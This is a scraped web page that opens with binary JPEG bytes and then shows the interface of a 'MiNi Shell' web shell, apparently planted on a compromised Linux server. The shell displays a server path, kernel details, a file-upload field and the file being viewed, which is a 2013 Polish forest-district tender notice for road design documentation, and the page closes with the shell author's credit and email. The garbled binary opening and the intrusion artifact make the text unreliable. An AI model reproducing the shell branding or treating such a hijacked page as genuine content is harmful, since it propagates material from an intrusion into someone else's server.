JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130801/309160-N-2013.html

<p class="kh_header"><b>Chodzież: OPRACOWANIE DOKUMENTACJI TECHNICZNEJ DLA ZADANIA PN. PRZEBUDOWA PRZECIWPOŻAROWEJ DROGI LEŚNEJ NR 18 POŁOŻONEJ W LEŚNICTWACH: BUDZYŃ I DRĄŻKI ORAZ PRZEBUDOWA DROGI LEŚNEJ W LEŚNICTWIE KARCZEWNIK</b><br>
<b>Numer ogłoszenia: 309160 - 2013; data zamieszczenia: 01.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Podanin , Podanin 65, 64-800 Chodzież, woj. wielkopolskie, tel. 067 2828019, 2829897, 2810781, faks 067 2810785.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_pila/nadl_podanin</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI TECHNICZNEJ DLA ZADANIA PN. PRZEBUDOWA PRZECIWPOŻAROWEJ DROGI LEŚNEJ NR 18 POŁOŻONEJ W LEŚNICTWACH: BUDZYŃ I DRĄŻKI ORAZ PRZEBUDOWA DROGI LEŚNEJ W LEŚNICTWIE KARCZEWNIK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: opracowanie dokumentacji technicznej dla zadania pn.: Przebudowa przeciwpożarowej drogi leśnej nr 18 położonej w leśnictwach: Budzyń i Drążki oraz przebudowa drogi leśnej w Leśnictwie Karczewnik
2.	Opis przedmiotu zamówienia:
a.	Projekt techniczny należy opracować na mapie gospodarczej w skali 1:5000 (mapy przekaże Zamawiający),
b.	Zakres prac projektowych obejmuje wykonanie:
planu orientacyjnego,  
szkicu usytuowania obiektu (planu sytuacyjnego),
opisu technicznego,
rysunków (przekroje poprzeczne, przekrój konstrukcyjny, schematy skrzyżowań),
przedmiaru robót wraz ze szczegółowymi obliczeniami,
szczegółowych specyfikacji technicznych robót.
c.	Projekt powinien być wykonany w oparciu o:
Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 roku (Dz. U. z 1999 r., nr 43, poz. 430 z późn. zm.) w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie,
Ustawę z dnia 7 lipca 1995 roku Prawo budowlane (Dz. U. z 2010 r., nr 243, poz. 1623 z późn. zm.),
Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. (Dz. U. z 2004 r., nr 130, poz. 1389)  w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym,
Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. z 2004 r., nr 202, poz. 2072 z późn. zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego,
Wytyczne zawarte w poradniku technicznym Drogi Leśne Dyrekcji Generalnej Lasów Państwowych. 
d.	Projekt musi zawierać:
część opisowo - rysunkowo - obliczeniową w 5 egzemplarzach,
kosztorys inwestorski (sporządzony metodą uproszczoną) i ofertowy - po 1 egzemplarzu,
szczegółową specyfikację techniczną wykonania i odbioru robót w 5 egzemplarzach,
wersję elektroniczną na płycie CD (w formacie pdf.) w 1 egzemplarzu.
3.	Usytuowanie drogi leśnej w Leśnictwach Budzyń i Drążki stanowi załącznik nr 9 do SIWZ.
4.	Usytuowanie drogi leśnej w Leśnictwie Karczewnik stanowi załącznik nr 10 do SIWZ.
5.	Wszystkie niezbędne poprawki i uzupełnienia do w/w opracowań, jakie wynikną po ich sprawdzeniu, firma projektowa wykona w ramach ceny zawartej w umowie.
6.	Do obowiązków Wykonawcy będzie należało:
a.	szczegółowe sprawdzenie w terenie warunków wykonania zamówienia,
b.	konsultacje z Zamawiającym na każdym etapie projektowania, dotyczące istotnych elementów mających wpływ na koszty przedsięwzięcia,
c.	zapewnienie nadzoru autorskiego w czasie prowadzenia inwestycji, przez którą należy rozumieć wykonywanie obowiązków określonych przez przepisy prawa; w ramach nadzoru autorskiego i wynagrodzenia określonego w formularzu ofertowym mieści się również wykonywanie opracowań zastępczych, uzupełnień, aktualizacji, rysunków itp. niezbędnych do prawidłowego przebiegu realizacji inwestycji,
d.	udzielenie Zamawiającemu odpowiedzi i wyjaśnień dotyczących dokumentacji projektowej w przypadku zapytań lub odwołań przez uczestników postępowania o zamówienie publiczne na roboty budowlane; stosowne wyjaśnienie Wykonawca będzie przekazywał Zamawiającemu niezwłocznie, lecz nie później niż w ciągu 2 dni roboczych od otrzymania zapytania drogą faksową, elektroniczną lub w formie pisemnej od Zamawiającego,
e.	wykonanie wszelkich innych prac i czynności koniecznych do wykonania umowy. 
7.	Wykonawca obowiązany będzie do realizacji przedmiotu zamówienia z najwyższą starannością, zgodnie z zaleceniami Zamawiającego, zasadami współczesnej wiedzy technicznej, obowiązującymi Polskimi Normami oraz obowiązującymi w Polsce przepisami prawa.
8.	Stwierdzone wady projektu Wykonawca będzie usuwał niezwłocznie. Początek rozpoczęcia prac nad usuwaniem takich usterek nie może przekroczyć liczby dwóch dni, licząc od daty uzyskania informacji o wadzie.
9.	Wykonawca może powierzyć wykonywanie prac projektowych podwykonawcom pod warunkiem zgłoszenia o tym Zamawiającemu oraz przedstawieniu do akceptacji projektu umowy z podwykonawcą.
10.	Warunki rozliczania wykonania przedmiotu zamówienia:
a.	z wybranym Wykonawcą zostanie zawarta umowa za cenę ryczałtową,
b.	wynagrodzenie Wykonawcy ustala się w formie ryczałtu za wykonanie przedmiotu zamówienia, jakikolwiek błąd w jej obliczeniu nie ma znaczenia na poprawność obliczenia ceny oferty.
c.	Zamawiający przewiduje rozliczenie końcowe za wykonane prace. Podstawą do wystawienia faktury końcowej będzie bezusterkowy protokół przekazania kompletnej dokumentacji podpisany przez Wykonawcę i Zamawiającego.
d.	Zapłata za fakturę nastąpi z wykorzystaniem terminu odroczonej zapłaty - do 30 dni licząc od dnia złożenia prawidłowo wystawionej faktury u Zamawiającego.
11.	W ramach należnego wynagrodzenia Wykonawca będzie sprawował nadzór autorski.
12.	Podstawa opracowania projektu technicznego:
a.	konsultacje i uzgodnienia z wyznaczonymi przedstawicielami Zamawiającego,
b.	obowiązujące przepisy.
13.	Dodatkowe uwagi w odniesieniu do przedmiotu zamówienie: 
a.	zastosowanie w projekcie rozwiązań standardowych skutkujących optymalizacją kosztów;
b.	opisywanie proponowanych materiałów z zachowaniem przepisów wynikających z art. 29-31 Prawa zamówień publicznych, tj. za pomocą parametrów technicznych tzn. bez podawania ich nazw, patentów lub pochodzenia. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia to Wykonawca (projektant) zobowiązany jest do podania co najmniej dwóch producentów tych materiałów lub urządzeń z użyciem sformułowania lub równoważne oraz określenia minimalnych wymagań dotyczących ich równoważności;
14.	Pełnienie nadzoru autorskiego:
a.	do obowiązków Wykonawcy będzie należało pełnienie nadzoru autorskiego w ramach wynagrodzenia należnego za wykonanie dokumentacji projektowej. Nadzór autorski będzie pełniony w trakcie realizacji robót budowlanych. 
b.	W ramach nadzoru autorskiego Wykonawca zobowiązany będzie do:
uzupełniania szczegółów projektu technicznego oraz wyjaśniania Wykonawcy robót budowlanych wątpliwości powstałych w toku realizacji tych robót;
udziału w naradach technicznych -  przyjmuje się, że liczba pobytów projektanta(ów) na budowie wynikać będzie z uzasadnionych potrzeb określonych każdorazowo przez Zamawiającego lub występującego w jego imieniu Inspektora Nadzoru, a w wyjątkowych sytuacjach - przez Wykonawcę robót budowlanych, wykonywanych na podstawie projektu technicznego będącego przedmiotem niniejszego postępowania;
udziału w odbiorze końcowym inwestycji - wynikać będzie z uzasadnionych potrzeb Zamawiającego.
c.	Wykonawca zapewni pełnienie nadzoru autorskiego przez właściwych projektantów przez cały okres w jakim wykonywana będzie inwestycja.
d.	nadzór autorski będzie obejmował czynności określone w art. 20 ust. 4 ustawy Prawo budowlane (Dz. U. z 2010 r., nr 243, poz. 1623 z późn. zm.), w tym:
stwierdzania w toku wykonywania robót budowlanych zgodności realizacji z projektem,
uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez Kierownika Budowy lub Inspektora Nadzoru oraz czynności określone wymaganiami Zamawiającego, w tym wyjaśnianie wątpliwości dotyczących projektu i zawartych w nim rozwiązań,
Nadzór autorski będzie wykonywany w formach: wizyt na budowie oraz innych (wymaganych dla właściwego sprawowania nadzoru autorskiego),
e.	Usuwanie braków lub błędów w projekcie nie stanowi nadzoru autorskiego, lecz będzie wykonywane w ramach odpowiedzialności Wykonawcy za należyte wykonanie dokumentacji projektowo - kosztorysowej, w terminie 3 dni roboczych od zawiadomienia Wykonawcy o stwierdzonych brakach lub błędach.
f.	Podjęcie czynności nadzoru autorskiego związanej z obecnością na budowie, bądź w innej formie powinny każdorazowo nastąpić nie później niż w terminie 3 dni od zawiadomienia przez Zamawiającego mailem, faxem lub telefonicznie.
15.	Inne obowiązki projektanta:
a.	w ramach wynagrodzenia za wykonanie projektu technicznego w toku procedury przetargowej wyboru Wykonawcy robót budowlanych, Wykonawca będzie zobowiązany do współpracy z Zamawiającym polegającej na udzielaniu odpowiedzi na pytania Wykonawców robót budowlanych dotyczące wykonanej dokumentacji,
b.	w przypadku zaproponowania w ofertach przetargowych na wykonanie robót budowlanych, materiałów lub urządzeń równoważnych, tzn.: o parametrach nie gorszych niż przedstawione w opracowanej dokumentacji projektowej - Wykonawca zobowiązuje się do wydania, na etapie analizy ofert i na wniosek Zamawiającego, pisemnej opinii na temat parametrów tych materiałów, 
c.	w ramach wynagrodzenia za wykonanie projektu technicznego Wykonawca będzie zobowiązany do uczestnictwa w przeglądach gwarancyjnych projektowanych dróg.
16.	Przepisy prawne regulujące podstawę wykonania zamówienia:
a.	ustawa z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj. Dz. U. z 2010 r.  nr 113 poz. 759 z późn. zm.);
b.	ustawa z dnia 23.04.1964 r. Kodeks cywilny (Dz. U. z 1964 r. nr 16, poz. 93 z późn. zm.),
c.	ustawa z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623  z późn. zm.);
d.	rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 r., nr 226, poz. 1817),
e.	rozporządzenie Prezesa Rady Ministrów z dnia 16 grudnia 2011 r. w sprawie średniego kursu złotego w stosunku do euro stanowiącego podstawę przeliczania wartości zamówień publicznych (DZ. U. z 2011 r., nr 282 poz. 1650),
f.	ustawa z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2004 r. Nr 92, poz. 881 z późn. zm.);
g.	rozporządzenie Ministra Infrastruktury z dnia 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003 r., nr 47 poz. 401);
h.	rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia ( Dz. U. z 2003 r., nr 120, poz. 1126);
i.	Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 roku (Dz. U. z 1999 r., nr 43, poz. 430 z późn. zm.) w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie,
j.	Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. (Dz. U. z 2004 r., nr 130, poz. 1389)  w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym,
k.	Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. z 2004 r., nr 202, poz. 2072 z późn. zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego,
l.	Wytyczne zawarte w poradniku technicznym Drogi Leśne Dyrekcji Generalnej Lasów Państwowych. 
m.	przepisy i wytyczne branżowe.
17.	Warunki zapłaty:
a.	Wynagrodzenie za przedmiot umowy zostanie wypłacone Wykonawcy po dostarczeniu do siedziby Zamawiającego kompletnej dokumentacji projektowej łącznie oraz podpisaniu przez obie strony bezusterkowego protokołu zdawczo - odbiorczego,
b.	Wykonawca za wykonaną usługę wystawi Zamawiającemu fakturę VAT płatną przelewem w terminie do 30 dni od dnia dostarczenia do siedziby Zamawiającego prawidłowo wystawionej faktury VAT na konto bankowe wskazane przez Wykonawcę na fakturze.
a.	Wykonawca zobowiązany będzie do wystawienia faktury, o której mowa powyżej na:
Nadleśnictwo Podanin
Podanin 65
64-800 Chodzież
NIP: 764-000-29-97
b.	Zamawiający, w przypadku opóźnienia płatności zobowiązany będzie do zapłaty odsetek zgodnie z przepisami ustawy z dnia 12 czerwca 2003 r. o terminach w transakcjach handlowych (Dz. U. z 2003 r., nr 139, poz. 1323 z późn. zm.).
c.	W przypadku zaniechania realizacji zadania, kwota o której mowa w ust. 15 pkt. a. tiret 2 zostanie wypłacona Wykonawcy po upływie terminu przewidzianego na wszczęcie postępowania tj. 3 lat..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.70.00-1, 71.24.80.00-8, 71.24.20.00-6, 71.24.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał należycie, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w - tym zakresie minimum jedno opracowanie projektowe dotyczące budowy, przebudowy lub remontu drogi, na kwotę min. 20.000,00 zł brutto.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę na zasadzie SPEŁNIA - NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej 1 osobą z uprawnieniami budowlanymi bez ograniczeń do projektowania w specjalności drogowej, która posiada co najmniej 5 letnie doświadczenie na stanowisku projektanta w ww. specjalności.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę na zasadzie SPEŁNIA - NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta cenowa, odpowiednie pełnomocnictwa</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian terminu realizacji umowy w sytuacji, gdy:
pomimo wystąpienia przez Wykonawcę z właściwie przygotowanym wnioskiem o wydanie decyzji administracyjnych lub warunków technicznych, lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy, w terminie przewidzianym w odrębnych przepisach, organ administracji publicznej lub inna instytucja nie wyda stosownego dokumentu. W takim przypadku termin wykonania przedmiotu umowy zostanie przesunięty o ilość dni zwłoki w wydaniu stosownego dokumentu;
Zamawiający z ważnych przyczyn, nie dających się przewidzieć w chwili zawarcia umowy, wstrzyma wykonywanie prac projektowych. W takim przypadku termin wykonania przedmiotu umowy zostanie przesunięty o ilość dni równą okresowi wstrzymania prac;
nastąpi zmiana obowiązującej stawki podatku VAT. W takim przypadku cena przedmiotu umowy zostanie odpowiednio zmieniona;
zaistnieją przyczyny niezależne od działania Stron umowy, których przy zachowaniu wszelkich należnych środków nie można uniknąć ani im zapobiec. W takiej sytuacji termin wykonania przedmiotu umowy zostanie przesunięty o uzasadnioną okolicznościami ilość dni ustaloną przez Strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_pila/nadl_podanin<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Podanin, Podanin 65, 64-800 Chodzież, Dział Administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 09:00, miejsce: Nadleśnictwo Podanin, Podanin 65, 64-800 Chodzież, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com